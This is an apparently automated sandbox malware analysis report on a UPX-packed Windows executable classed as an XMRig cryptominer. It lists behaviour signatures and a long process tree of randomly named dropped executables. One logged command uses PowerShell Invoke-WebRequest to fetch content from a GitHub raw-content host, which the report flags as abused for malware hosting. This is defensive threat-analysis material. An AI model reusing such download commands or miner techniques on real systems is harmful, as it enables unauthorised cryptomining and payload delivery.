Malware Analysis Report

2024-11-16 11:01

Sample ID 240612-mtlhwa1gpb
Target 341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe
SHA256 fcf8fc5f66704a004ea044d057c0430ea90f7a9cb5c0d394a1900dce69b4f7e5
Tags upx miner xmrig execution
Score 10/10

Analysis Overview

score
10/10

SHA256

fcf8fc5f66704a004ea044d057c0430ea90f7a9cb5c0d394a1900dce69b4f7e5

Threat Level: Known bad

The file 341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe was found to be: Known bad.

Malicious Activity Summary

upx miner xmrig execution

xmrig

Xmrig family

XMRig Miner payload

Command and Scripting Interpreter: PowerShell

Executes dropped EXE

UPX packed file

Loads dropped DLL

Legitimate hosting services abused for malware hosting/C2

Drops file in Windows directory

Unsigned PE

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-12 10:45

Signatures

XMRig Miner payload

miner

Xmrig family

xmrig

UPX packed file

upx

Unsigned PE


Analysis: behavioral1

Detonation Overview

Submitted

2024-06-12 10:45

Reported

2024-06-12 10:48

Platform

win7-20240611-en

Max time kernel

149s

Max time network

154s

Command Line

"C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE


Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A

UPX packed file

upx

Drops file in Windows directory


Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory


Processes

C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe

"C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "


C:\Windows\System\qHYbYrJ.exe

C:\Windows\System\qHYbYrJ.exe

C:\Windows\System\GJVfUrS.exe

C:\Windows\System\GJVfUrS.exe

C:\Windows\System\hpjuQFi.exe

C:\Windows\System\hpjuQFi.exe

C:\Windows\System\xKrpqqH.exe

C:\Windows\System\xKrpqqH.exe

C:\Windows\System\YeaCzxq.exe

C:\Windows\System\YeaCzxq.exe

C:\Windows\System\klNqSjZ.exe

C:\Windows\System\klNqSjZ.exe

C:\Windows\System\TDoijeU.exe

C:\Windows\System\TDoijeU.exe

C:\Windows\System\bNCbPWi.exe

C:\Windows\System\bNCbPWi.exe

C:\Windows\System\XkFnCVg.exe

C:\Windows\System\XkFnCVg.exe

C:\Windows\System\pgssfdG.exe

C:\Windows\System\pgssfdG.exe

C:\Windows\System\KXnVWTB.exe

C:\Windows\System\KXnVWTB.exe

C:\Windows\System\iOmywPv.exe

C:\Windows\System\iOmywPv.exe

C:\Windows\System\rerNJQn.exe

C:\Windows\System\rerNJQn.exe

C:\Windows\System\iPYOyFv.exe

C:\Windows\System\iPYOyFv.exe

C:\Windows\System\BCQcRTu.exe

C:\Windows\System\BCQcRTu.exe

C:\Windows\System\LJtOFAw.exe

C:\Windows\System\LJtOFAw.exe

C:\Windows\System\oFCKjmX.exe

C:\Windows\System\oFCKjmX.exe

C:\Windows\System\ocmfrEr.exe

C:\Windows\System\ocmfrEr.exe

C:\Windows\System\JSiYGXQ.exe

C:\Windows\System\JSiYGXQ.exe

C:\Windows\System\HyISCiA.exe

C:\Windows\System\HyISCiA.exe

C:\Windows\System\EDCcqaZ.exe

C:\Windows\System\EDCcqaZ.exe

C:\Windows\System\pPZUzgm.exe

C:\Windows\System\pPZUzgm.exe

C:\Windows\System\zeZuiWb.exe

C:\Windows\System\zeZuiWb.exe

C:\Windows\System\jixIaPN.exe

C:\Windows\System\jixIaPN.exe

C:\Windows\System\ynifzlK.exe

C:\Windows\System\ynifzlK.exe

C:\Windows\System\iWetlBw.exe

C:\Windows\System\iWetlBw.exe

C:\Windows\System\RdriDZE.exe

C:\Windows\System\RdriDZE.exe

C:\Windows\System\MtaytWT.exe

C:\Windows\System\MtaytWT.exe

C:\Windows\System\DTRCxSm.exe

C:\Windows\System\DTRCxSm.exe

C:\Windows\System\vHuaZSR.exe

C:\Windows\System\vHuaZSR.exe

C:\Windows\System\SnQzkId.exe

C:\Windows\System\SnQzkId.exe

C:\Windows\System\UOLhwUK.exe

C:\Windows\System\UOLhwUK.exe

C:\Windows\System\HIBqZxd.exe

C:\Windows\System\HIBqZxd.exe

C:\Windows\System\YRAvXgZ.exe

C:\Windows\System\YRAvXgZ.exe

C:\Windows\System\GjSwpzk.exe

C:\Windows\System\GjSwpzk.exe

C:\Windows\System\VFPrdjD.exe

C:\Windows\System\VFPrdjD.exe

C:\Windows\System\IYEOOMH.exe

C:\Windows\System\IYEOOMH.exe

C:\Windows\System\vnqnWQL.exe

C:\Windows\System\vnqnWQL.exe

C:\Windows\System\RJlJBVU.exe

C:\Windows\System\RJlJBVU.exe

C:\Windows\System\ThGzaoo.exe

C:\Windows\System\ThGzaoo.exe

C:\Windows\System\yfJqMuv.exe

C:\Windows\System\yfJqMuv.exe

C:\Windows\System\HtNhlbk.exe

C:\Windows\System\HtNhlbk.exe

C:\Windows\System\MRsWrbE.exe

C:\Windows\System\MRsWrbE.exe

C:\Windows\System\kHDSlCY.exe

C:\Windows\System\kHDSlCY.exe

C:\Windows\System\URxSueI.exe

C:\Windows\System\URxSueI.exe

C:\Windows\System\oSIZgiP.exe

C:\Windows\System\oSIZgiP.exe

C:\Windows\System\PsctDYe.exe

C:\Windows\System\PsctDYe.exe

C:\Windows\System\oqEtjNX.exe

C:\Windows\System\oqEtjNX.exe

C:\Windows\System\NwMgZjd.exe

C:\Windows\System\NwMgZjd.exe

C:\Windows\System\IzdwsIt.exe

C:\Windows\System\IzdwsIt.exe

C:\Windows\System\LhQiwse.exe

C:\Windows\System\LhQiwse.exe

C:\Windows\System\NTtDjhk.exe

C:\Windows\System\NTtDjhk.exe

C:\Windows\System\gMJKJoW.exe

C:\Windows\System\gMJKJoW.exe

C:\Windows\System\WQOMzgv.exe

C:\Windows\System\WQOMzgv.exe

C:\Windows\System\hPSJQTl.exe

C:\Windows\System\hPSJQTl.exe

C:\Windows\System\EEnAOSz.exe

C:\Windows\System\EEnAOSz.exe

C:\Windows\System\lQaxjSw.exe

C:\Windows\System\lQaxjSw.exe

C:\Windows\System\BZHpxvx.exe

C:\Windows\System\BZHpxvx.exe

C:\Windows\System\EhHIUlY.exe

C:\Windows\System\EhHIUlY.exe

C:\Windows\System\bNjuScr.exe

C:\Windows\System\bNjuScr.exe

C:\Windows\System\KmEqRva.exe

C:\Windows\System\KmEqRva.exe

C:\Windows\System\ZydQwxN.exe

C:\Windows\System\ZydQwxN.exe

C:\Windows\System\KWGsMfp.exe

C:\Windows\System\KWGsMfp.exe

C:\Windows\System\CtooMBC.exe

C:\Windows\System\CtooMBC.exe

C:\Windows\System\RCMlEAO.exe

C:\Windows\System\RCMlEAO.exe

C:\Windows\System\EGAjMGB.exe

C:\Windows\System\EGAjMGB.exe

C:\Windows\System\EsloAme.exe

C:\Windows\System\EsloAme.exe

C:\Windows\System\HwbdFQs.exe

C:\Windows\System\HwbdFQs.exe

C:\Windows\System\FCWbixp.exe

C:\Windows\System\FCWbixp.exe

C:\Windows\System\eTvJMuB.exe

C:\Windows\System\eTvJMuB.exe

C:\Windows\System\WwZyzur.exe

C:\Windows\System\WwZyzur.exe

C:\Windows\System\mpjdMBH.exe

C:\Windows\System\mpjdMBH.exe

C:\Windows\System\rWTHHNN.exe

C:\Windows\System\rWTHHNN.exe

C:\Windows\System\VEyyVNa.exe

C:\Windows\System\VEyyVNa.exe

C:\Windows\System\CKxMYjM.exe

C:\Windows\System\CKxMYjM.exe

C:\Windows\System\MmFLUKc.exe

C:\Windows\System\MmFLUKc.exe

C:\Windows\System\fcBuPDY.exe

C:\Windows\System\fcBuPDY.exe

C:\Windows\System\WLHQyCv.exe

C:\Windows\System\WLHQyCv.exe

C:\Windows\System\wwikcQd.exe

C:\Windows\System\wwikcQd.exe

C:\Windows\System\kGMlNnt.exe

C:\Windows\System\kGMlNnt.exe

C:\Windows\System\OPdZvWC.exe

C:\Windows\System\OPdZvWC.exe

C:\Windows\System\jGIsNma.exe

C:\Windows\System\jGIsNma.exe

C:\Windows\System\chgLutE.exe

C:\Windows\System\chgLutE.exe

C:\Windows\System\zzpKnBm.exe

C:\Windows\System\zzpKnBm.exe

C:\Windows\System\vPjocyq.exe

C:\Windows\System\vPjocyq.exe

C:\Windows\System\PCNDNol.exe

C:\Windows\System\PCNDNol.exe

C:\Windows\System\xmQhBJp.exe

C:\Windows\System\xmQhBJp.exe

C:\Windows\System\NJJJLOe.exe

C:\Windows\System\NJJJLOe.exe

C:\Windows\System\xeLylgD.exe

C:\Windows\System\xeLylgD.exe

C:\Windows\System\GrzegEs.exe

C:\Windows\System\GrzegEs.exe

C:\Windows\System\ZWJJoQC.exe

C:\Windows\System\ZWJJoQC.exe

C:\Windows\System\OsmtXTD.exe

C:\Windows\System\OsmtXTD.exe

C:\Windows\System\qDqLbiG.exe

C:\Windows\System\qDqLbiG.exe

C:\Windows\System\pMgXoir.exe

C:\Windows\System\pMgXoir.exe

C:\Windows\System\HjwYuSJ.exe

C:\Windows\System\HjwYuSJ.exe

C:\Windows\System\ZeSRlMM.exe

C:\Windows\System\ZeSRlMM.exe

C:\Windows\System\tzYJuEh.exe

C:\Windows\System\tzYJuEh.exe

C:\Windows\System\uydtgsP.exe

C:\Windows\System\uydtgsP.exe

C:\Windows\System\LutixkG.exe

C:\Windows\System\LutixkG.exe

C:\Windows\System\ZVseOgx.exe

C:\Windows\System\ZVseOgx.exe

C:\Windows\System\AXQTopt.exe

C:\Windows\System\AXQTopt.exe

C:\Windows\System\yiwESqP.exe

C:\Windows\System\yiwESqP.exe

C:\Windows\System\UDYKFnW.exe

C:\Windows\System\UDYKFnW.exe

C:\Windows\System\nnaqKRN.exe

C:\Windows\System\nnaqKRN.exe

C:\Windows\System\SgEVwKl.exe

C:\Windows\System\SgEVwKl.exe

C:\Windows\System\NADvDHN.exe

C:\Windows\System\NADvDHN.exe

C:\Windows\System\RKSXOdv.exe

C:\Windows\System\RKSXOdv.exe

C:\Windows\System\LrkopXt.exe

C:\Windows\System\LrkopXt.exe

C:\Windows\System\BhXlyXF.exe

C:\Windows\System\BhXlyXF.exe

C:\Windows\System\DeNvonR.exe

C:\Windows\System\DeNvonR.exe

C:\Windows\System\gNuBhZC.exe

C:\Windows\System\gNuBhZC.exe

C:\Windows\System\gLQlztD.exe

C:\Windows\System\gLQlztD.exe

C:\Windows\System\GPlkGsH.exe

C:\Windows\System\GPlkGsH.exe

C:\Windows\System\TuvezLT.exe

C:\Windows\System\TuvezLT.exe

C:\Windows\System\QPvlBuU.exe

C:\Windows\System\QPvlBuU.exe

C:\Windows\System\fafPSPv.exe

C:\Windows\System\fafPSPv.exe

C:\Windows\System\uMneOEy.exe

C:\Windows\System\uMneOEy.exe

C:\Windows\System\hZuhyau.exe

C:\Windows\System\hZuhyau.exe

C:\Windows\System\nEUNgTu.exe

C:\Windows\System\nEUNgTu.exe

C:\Windows\System\qsmcOfM.exe

C:\Windows\System\qsmcOfM.exe

C:\Windows\System\WxkmwpS.exe

C:\Windows\System\WxkmwpS.exe

C:\Windows\System\LYZtTTK.exe

C:\Windows\System\LYZtTTK.exe

C:\Windows\System\csIhHDW.exe

C:\Windows\System\csIhHDW.exe

C:\Windows\System\AwpuhyG.exe

C:\Windows\System\AwpuhyG.exe

C:\Windows\System\TkEGdtW.exe

C:\Windows\System\TkEGdtW.exe

C:\Windows\System\HSvlOuK.exe

C:\Windows\System\HSvlOuK.exe

C:\Windows\System\cGKQpNq.exe

C:\Windows\System\cGKQpNq.exe

C:\Windows\System\egUIBtu.exe

C:\Windows\System\egUIBtu.exe

C:\Windows\System\rWtxLVx.exe

C:\Windows\System\rWtxLVx.exe

C:\Windows\System\aJXuLvO.exe

C:\Windows\System\aJXuLvO.exe

C:\Windows\System\oveKTQG.exe

C:\Windows\System\oveKTQG.exe

C:\Windows\System\NIcnIpL.exe

C:\Windows\System\NIcnIpL.exe

C:\Windows\System\IUsMELe.exe

C:\Windows\System\IUsMELe.exe

C:\Windows\System\aEoIdXS.exe

C:\Windows\System\aEoIdXS.exe

C:\Windows\System\tjuZsmc.exe

C:\Windows\System\tjuZsmc.exe

C:\Windows\System\mpXnmNJ.exe

C:\Windows\System\mpXnmNJ.exe

C:\Windows\System\JynZZhQ.exe

C:\Windows\System\JynZZhQ.exe

C:\Windows\System\tVpbeJR.exe

C:\Windows\System\tVpbeJR.exe

C:\Windows\System\UxXHxsf.exe

C:\Windows\System\UxXHxsf.exe

C:\Windows\System\PzomkcT.exe

C:\Windows\System\PzomkcT.exe

C:\Windows\System\hyCrQXV.exe

C:\Windows\System\hyCrQXV.exe

C:\Windows\System\ImheqYH.exe

C:\Windows\System\ImheqYH.exe

C:\Windows\System\vgdjtYC.exe

C:\Windows\System\vgdjtYC.exe

C:\Windows\System\feSJFfk.exe

C:\Windows\System\feSJFfk.exe

C:\Windows\System\vDouZQA.exe

C:\Windows\System\vDouZQA.exe

C:\Windows\System\SKgiZoA.exe

C:\Windows\System\SKgiZoA.exe

C:\Windows\System\Ibsmbsk.exe

C:\Windows\System\Ibsmbsk.exe

C:\Windows\System\uQPdNPv.exe

C:\Windows\System\uQPdNPv.exe

C:\Windows\System\huuYYPZ.exe

C:\Windows\System\huuYYPZ.exe

C:\Windows\System\mMoaGNh.exe

C:\Windows\System\mMoaGNh.exe

C:\Windows\System\DwkRNOV.exe

C:\Windows\System\DwkRNOV.exe

C:\Windows\System\MyTHNqX.exe

C:\Windows\System\MyTHNqX.exe

C:\Windows\System\DCVOwKS.exe

C:\Windows\System\DCVOwKS.exe

C:\Windows\System\WINBlHf.exe

C:\Windows\System\WINBlHf.exe

C:\Windows\System\GLxsxpZ.exe

C:\Windows\System\GLxsxpZ.exe

C:\Windows\System\XpkmbXV.exe

C:\Windows\System\XpkmbXV.exe

C:\Windows\System\sjVRkeS.exe

C:\Windows\System\sjVRkeS.exe

C:\Windows\System\WjDNecO.exe

C:\Windows\System\WjDNecO.exe

C:\Windows\System\fhgoRPE.exe

C:\Windows\System\fhgoRPE.exe

C:\Windows\System\gRLeGxS.exe

C:\Windows\System\gRLeGxS.exe

C:\Windows\System\scgltOD.exe

C:\Windows\System\scgltOD.exe

C:\Windows\System\wBOszXL.exe

C:\Windows\System\wBOszXL.exe

C:\Windows\System\WZrgAqI.exe

C:\Windows\System\WZrgAqI.exe

C:\Windows\System\xfxwAFx.exe

C:\Windows\System\xfxwAFx.exe

C:\Windows\System\OdwkFPw.exe

C:\Windows\System\OdwkFPw.exe

C:\Windows\System\jQfpBNM.exe

C:\Windows\System\jQfpBNM.exe

C:\Windows\System\rWUqjFH.exe

C:\Windows\System\rWUqjFH.exe

C:\Windows\System\QoNWBAE.exe

C:\Windows\System\QoNWBAE.exe

C:\Windows\System\vizTyBW.exe

C:\Windows\System\vizTyBW.exe

C:\Windows\System\aYejCjV.exe

C:\Windows\System\aYejCjV.exe

C:\Windows\System\vOvoNMH.exe

C:\Windows\System\vOvoNMH.exe

C:\Windows\System\ZJRomaU.exe

C:\Windows\System\ZJRomaU.exe

C:\Windows\System\gcbBBaW.exe

C:\Windows\System\gcbBBaW.exe

C:\Windows\System\wMoSDKQ.exe

C:\Windows\System\wMoSDKQ.exe

C:\Windows\System\dXdflEA.exe

C:\Windows\System\dXdflEA.exe

C:\Windows\System\lrPontA.exe

C:\Windows\System\lrPontA.exe

C:\Windows\System\kbzTUkB.exe

C:\Windows\System\kbzTUkB.exe

C:\Windows\System\VOUBTnl.exe

C:\Windows\System\VOUBTnl.exe

C:\Windows\System\kYYwlqP.exe

C:\Windows\System\kYYwlqP.exe

C:\Windows\System\teFRXVm.exe

C:\Windows\System\teFRXVm.exe

C:\Windows\System\THgCfOn.exe

C:\Windows\System\THgCfOn.exe

C:\Windows\System\JpUvFCe.exe

C:\Windows\System\JpUvFCe.exe

C:\Windows\System\VrGuZOJ.exe

C:\Windows\System\VrGuZOJ.exe

C:\Windows\System\rzwUhui.exe

C:\Windows\System\rzwUhui.exe

C:\Windows\System\egPWGnG.exe

C:\Windows\System\egPWGnG.exe

C:\Windows\System\IsDziRe.exe

C:\Windows\System\IsDziRe.exe

C:\Windows\System\qGoOWLh.exe

C:\Windows\System\qGoOWLh.exe

C:\Windows\System\KVlMScU.exe

C:\Windows\System\KVlMScU.exe

C:\Windows\System\xUeFzAm.exe

C:\Windows\System\xUeFzAm.exe

C:\Windows\System\yBUqAMz.exe

C:\Windows\System\yBUqAMz.exe

C:\Windows\System\jKyaTtK.exe

C:\Windows\System\jKyaTtK.exe

C:\Windows\System\QDHdSDj.exe

C:\Windows\System\QDHdSDj.exe

C:\Windows\System\KEjPnlD.exe

C:\Windows\System\KEjPnlD.exe

C:\Windows\System\EUPrDwi.exe

C:\Windows\System\EUPrDwi.exe

C:\Windows\System\aOVEubL.exe

C:\Windows\System\aOVEubL.exe

C:\Windows\System\OgVLStw.exe

C:\Windows\System\OgVLStw.exe

C:\Windows\System\tiUqRaG.exe

C:\Windows\System\tiUqRaG.exe

C:\Windows\System\YQLQGJL.exe

C:\Windows\System\YQLQGJL.exe

C:\Windows\System\wepWfSl.exe

C:\Windows\System\wepWfSl.exe

C:\Windows\System\oMBwHyM.exe

C:\Windows\System\oMBwHyM.exe

C:\Windows\System\UaCGSzG.exe

C:\Windows\System\UaCGSzG.exe

C:\Windows\System\VUoyHwO.exe

C:\Windows\System\VUoyHwO.exe

C:\Windows\System\HPXuhZI.exe

C:\Windows\System\HPXuhZI.exe

C:\Windows\System\VVwrzSe.exe

C:\Windows\System\VVwrzSe.exe

C:\Windows\System\ZHFFwcy.exe

C:\Windows\System\ZHFFwcy.exe

C:\Windows\System\LYaBNDA.exe

C:\Windows\System\LYaBNDA.exe

C:\Windows\System\tpAgsLO.exe

C:\Windows\System\tpAgsLO.exe

C:\Windows\System\PNqclsH.exe

C:\Windows\System\PNqclsH.exe

C:\Windows\System\MvsSUmN.exe

C:\Windows\System\MvsSUmN.exe

C:\Windows\System\NrEyWEd.exe

C:\Windows\System\NrEyWEd.exe

C:\Windows\System\ugbNCIx.exe

C:\Windows\System\ugbNCIx.exe

C:\Windows\System\enqidYj.exe

C:\Windows\System\enqidYj.exe

C:\Windows\System\Yldlpps.exe

C:\Windows\System\Yldlpps.exe

C:\Windows\System\fWeaLDy.exe

C:\Windows\System\fWeaLDy.exe

C:\Windows\System\MjkHonU.exe

C:\Windows\System\MjkHonU.exe

C:\Windows\System\mbYZSEZ.exe

C:\Windows\System\mbYZSEZ.exe

C:\Windows\System\CvUJlTn.exe

C:\Windows\System\CvUJlTn.exe

C:\Windows\System\pHrbvBc.exe

C:\Windows\System\pHrbvBc.exe

C:\Windows\System\BGcPVjM.exe

C:\Windows\System\BGcPVjM.exe

C:\Windows\System\MyapdPW.exe

C:\Windows\System\MyapdPW.exe

C:\Windows\System\rFreQcr.exe

C:\Windows\System\rFreQcr.exe

C:\Windows\System\cmGKUCN.exe

C:\Windows\System\cmGKUCN.exe

C:\Windows\System\jcIVfPh.exe

C:\Windows\System\jcIVfPh.exe

C:\Windows\System\lcfqHUJ.exe

C:\Windows\System\lcfqHUJ.exe

C:\Windows\System\RCQceMY.exe

C:\Windows\System\RCQceMY.exe

C:\Windows\System\uJNCkqm.exe

C:\Windows\System\uJNCkqm.exe

C:\Windows\System\LGPrWmD.exe

C:\Windows\System\LGPrWmD.exe

C:\Windows\System\ImeLFFg.exe

C:\Windows\System\ImeLFFg.exe

C:\Windows\System\FmiZLjz.exe

C:\Windows\System\FmiZLjz.exe

C:\Windows\System\VyqXAVe.exe

C:\Windows\System\VyqXAVe.exe

C:\Windows\System\JXEIHNW.exe

C:\Windows\System\JXEIHNW.exe

C:\Windows\System\TsbaUsT.exe

C:\Windows\System\TsbaUsT.exe

C:\Windows\System\bhPKtnh.exe

C:\Windows\System\bhPKtnh.exe

C:\Windows\System\cdaRbRc.exe

C:\Windows\System\cdaRbRc.exe

C:\Windows\System\baftnwk.exe

C:\Windows\System\baftnwk.exe

C:\Windows\System\XwTnutp.exe

C:\Windows\System\XwTnutp.exe

C:\Windows\System\kSFwruA.exe

C:\Windows\System\kSFwruA.exe

C:\Windows\System\CZugeZo.exe

C:\Windows\System\CZugeZo.exe

C:\Windows\System\deJfynx.exe

C:\Windows\System\deJfynx.exe

C:\Windows\System\sOdYHPJ.exe

C:\Windows\System\sOdYHPJ.exe

C:\Windows\System\wglbMjk.exe

C:\Windows\System\wglbMjk.exe

C:\Windows\System\MUPqaJQ.exe

C:\Windows\System\MUPqaJQ.exe

C:\Windows\System\BtsjsjT.exe

C:\Windows\System\BtsjsjT.exe

C:\Windows\System\GzYNGZy.exe

C:\Windows\System\GzYNGZy.exe

C:\Windows\System\YBkvvxU.exe

C:\Windows\System\YBkvvxU.exe

C:\Windows\System\DEVoMzn.exe

C:\Windows\System\DEVoMzn.exe

C:\Windows\System\aeYtcVT.exe

C:\Windows\System\aeYtcVT.exe

C:\Windows\System\FNETkiE.exe

C:\Windows\System\FNETkiE.exe

C:\Windows\System\enSsZTp.exe

C:\Windows\System\enSsZTp.exe

C:\Windows\System\ZBWALWt.exe

C:\Windows\System\ZBWALWt.exe

C:\Windows\System\FjqLgjB.exe

C:\Windows\System\FjqLgjB.exe

C:\Windows\System\qclwBgM.exe

C:\Windows\System\qclwBgM.exe

C:\Windows\System\hxclOQH.exe

C:\Windows\System\hxclOQH.exe

C:\Windows\System\PrcUOTE.exe

C:\Windows\System\PrcUOTE.exe

C:\Windows\System\lLrrbJJ.exe

C:\Windows\System\lLrrbJJ.exe

C:\Windows\System\cMsSiOB.exe

C:\Windows\System\cMsSiOB.exe

C:\Windows\System\rqiPEQP.exe

C:\Windows\System\rqiPEQP.exe

C:\Windows\System\VxfGgok.exe

C:\Windows\System\VxfGgok.exe

C:\Windows\System\prOvpnl.exe

C:\Windows\System\prOvpnl.exe

C:\Windows\System\DRviVUd.exe

C:\Windows\System\DRviVUd.exe

C:\Windows\System\nygfSeU.exe

C:\Windows\System\nygfSeU.exe

C:\Windows\System\rmkzaDB.exe

C:\Windows\System\rmkzaDB.exe

C:\Windows\System\ODXBrsz.exe

C:\Windows\System\ODXBrsz.exe

C:\Windows\System\oFmaMlc.exe

C:\Windows\System\oFmaMlc.exe

C:\Windows\System\dszokhy.exe

C:\Windows\System\dszokhy.exe

C:\Windows\System\AbcDHaL.exe

C:\Windows\System\AbcDHaL.exe

C:\Windows\System\wXadGUs.exe

C:\Windows\System\wXadGUs.exe

C:\Windows\System\rBgbTST.exe

C:\Windows\System\rBgbTST.exe

C:\Windows\System\CjjLlPh.exe

C:\Windows\System\CjjLlPh.exe

C:\Windows\System\NZZDEUe.exe

C:\Windows\System\NZZDEUe.exe

C:\Windows\System\DOETgNk.exe

C:\Windows\System\DOETgNk.exe

C:\Windows\System\VAFUkqm.exe

C:\Windows\System\VAFUkqm.exe

C:\Windows\System\dhBnNTk.exe

C:\Windows\System\dhBnNTk.exe

C:\Windows\System\fBpBxss.exe

C:\Windows\System\fBpBxss.exe

C:\Windows\System\GUcRiJn.exe

C:\Windows\System\GUcRiJn.exe

C:\Windows\System\JjJtOQd.exe

C:\Windows\System\JjJtOQd.exe

C:\Windows\System\huKxVFv.exe

C:\Windows\System\huKxVFv.exe

C:\Windows\System\lXOxXaD.exe

C:\Windows\System\lXOxXaD.exe

C:\Windows\System\dfNMDbx.exe

C:\Windows\System\dfNMDbx.exe

C:\Windows\System\JGDXiOL.exe

C:\Windows\System\JGDXiOL.exe

C:\Windows\System\PJAOXTj.exe

C:\Windows\System\PJAOXTj.exe

C:\Windows\System\kzKyfaY.exe

C:\Windows\System\kzKyfaY.exe

C:\Windows\System\ZNVCNPo.exe

C:\Windows\System\ZNVCNPo.exe

C:\Windows\System\VFAyINa.exe

C:\Windows\System\VFAyINa.exe

C:\Windows\System\HXMwgmk.exe

C:\Windows\System\HXMwgmk.exe

C:\Windows\System\DQfMSWx.exe

C:\Windows\System\DQfMSWx.exe

C:\Windows\System\fUWxJWZ.exe

C:\Windows\System\fUWxJWZ.exe

C:\Windows\System\oByfHvh.exe

C:\Windows\System\oByfHvh.exe

C:\Windows\System\XFtRwBo.exe

C:\Windows\System\XFtRwBo.exe

C:\Windows\System\jTjqyDQ.exe

C:\Windows\System\jTjqyDQ.exe

C:\Windows\System\pLOllyj.exe

C:\Windows\System\pLOllyj.exe

C:\Windows\System\DGBYnsu.exe

C:\Windows\System\DGBYnsu.exe

C:\Windows\System\yaivIzK.exe

C:\Windows\System\yaivIzK.exe

C:\Windows\System\BiLwqzA.exe

C:\Windows\System\BiLwqzA.exe

C:\Windows\System\HUWUIlg.exe

C:\Windows\System\HUWUIlg.exe

C:\Windows\System\zsfSmBW.exe

C:\Windows\System\zsfSmBW.exe

C:\Windows\System\DKIgOIT.exe

C:\Windows\System\DKIgOIT.exe

C:\Windows\System\sbClhDS.exe

C:\Windows\System\sbClhDS.exe

C:\Windows\System\NoVCJKx.exe

C:\Windows\System\NoVCJKx.exe

C:\Windows\System\gYCXGfO.exe

C:\Windows\System\gYCXGfO.exe

C:\Windows\System\uAeclDn.exe

C:\Windows\System\uAeclDn.exe

C:\Windows\System\WajrhqU.exe

C:\Windows\System\WajrhqU.exe

C:\Windows\System\gGmBedJ.exe

C:\Windows\System\gGmBedJ.exe

C:\Windows\System\pYxEKWH.exe

C:\Windows\System\pYxEKWH.exe

C:\Windows\System\xygeOJD.exe

C:\Windows\System\xygeOJD.exe

C:\Windows\System\aOOCtST.exe

C:\Windows\System\aOOCtST.exe

C:\Windows\System\vkffTcj.exe

C:\Windows\System\vkffTcj.exe

C:\Windows\System\mOkPylC.exe

C:\Windows\System\mOkPylC.exe

C:\Windows\System\MWivblW.exe

C:\Windows\System\MWivblW.exe

C:\Windows\System\OSNNmAE.exe

C:\Windows\System\OSNNmAE.exe

C:\Windows\System\fDoPtzQ.exe

C:\Windows\System\fDoPtzQ.exe

C:\Windows\System\lifHWUP.exe

C:\Windows\System\lifHWUP.exe

C:\Windows\System\WMSsKDn.exe

C:\Windows\System\WMSsKDn.exe

C:\Windows\System\uoFeCLW.exe

C:\Windows\System\uoFeCLW.exe

C:\Windows\System\jomMitF.exe

C:\Windows\System\jomMitF.exe

C:\Windows\System\zTmyhEr.exe

C:\Windows\System\zTmyhEr.exe

C:\Windows\System\GkwlAWV.exe

C:\Windows\System\GkwlAWV.exe

C:\Windows\System\hVWWMre.exe

C:\Windows\System\hVWWMre.exe

C:\Windows\System\OStqpwK.exe

C:\Windows\System\OStqpwK.exe

C:\Windows\System\FZcKWCH.exe

C:\Windows\System\FZcKWCH.exe

C:\Windows\System\htxpjGa.exe

C:\Windows\System\htxpjGa.exe

C:\Windows\System\mjBrbvi.exe

C:\Windows\System\mjBrbvi.exe

C:\Windows\System\KXjVzcH.exe

C:\Windows\System\KXjVzcH.exe

C:\Windows\System\MgCnejU.exe

C:\Windows\System\MgCnejU.exe

C:\Windows\System\nyilLzK.exe

C:\Windows\System\nyilLzK.exe

C:\Windows\System\IgRaTnb.exe

C:\Windows\System\IgRaTnb.exe

C:\Windows\System\gpfKZZR.exe

C:\Windows\System\gpfKZZR.exe

C:\Windows\System\dGRQQsn.exe

C:\Windows\System\dGRQQsn.exe

C:\Windows\System\PPUVXZm.exe

C:\Windows\System\PPUVXZm.exe

C:\Windows\System\mUUeQgR.exe

C:\Windows\System\mUUeQgR.exe

C:\Windows\System\XnfgdsS.exe

C:\Windows\System\XnfgdsS.exe

C:\Windows\System\UBZwkGy.exe

C:\Windows\System\UBZwkGy.exe

C:\Windows\System\dacwJKf.exe

C:\Windows\System\dacwJKf.exe

C:\Windows\System\HZjeuto.exe

C:\Windows\System\HZjeuto.exe

C:\Windows\System\BZdwiTJ.exe

C:\Windows\System\BZdwiTJ.exe

C:\Windows\System\NSfgLav.exe

C:\Windows\System\NSfgLav.exe

C:\Windows\System\FcGrnXh.exe

C:\Windows\System\FcGrnXh.exe

C:\Windows\System\lIOqyXG.exe

C:\Windows\System\lIOqyXG.exe

C:\Windows\System\IHAARMp.exe

C:\Windows\System\IHAARMp.exe

C:\Windows\System\HcBOJUZ.exe

C:\Windows\System\HcBOJUZ.exe

C:\Windows\System\LLhSRxn.exe

C:\Windows\System\LLhSRxn.exe

C:\Windows\System\GeNNruE.exe

C:\Windows\System\GeNNruE.exe

C:\Windows\System\epDfRHB.exe

C:\Windows\System\epDfRHB.exe

C:\Windows\System\lFWJnyL.exe

C:\Windows\System\lFWJnyL.exe

C:\Windows\System\dMYyDLq.exe

C:\Windows\System\dMYyDLq.exe

C:\Windows\System\LIigcCW.exe

C:\Windows\System\LIigcCW.exe

C:\Windows\System\vHtlNTk.exe

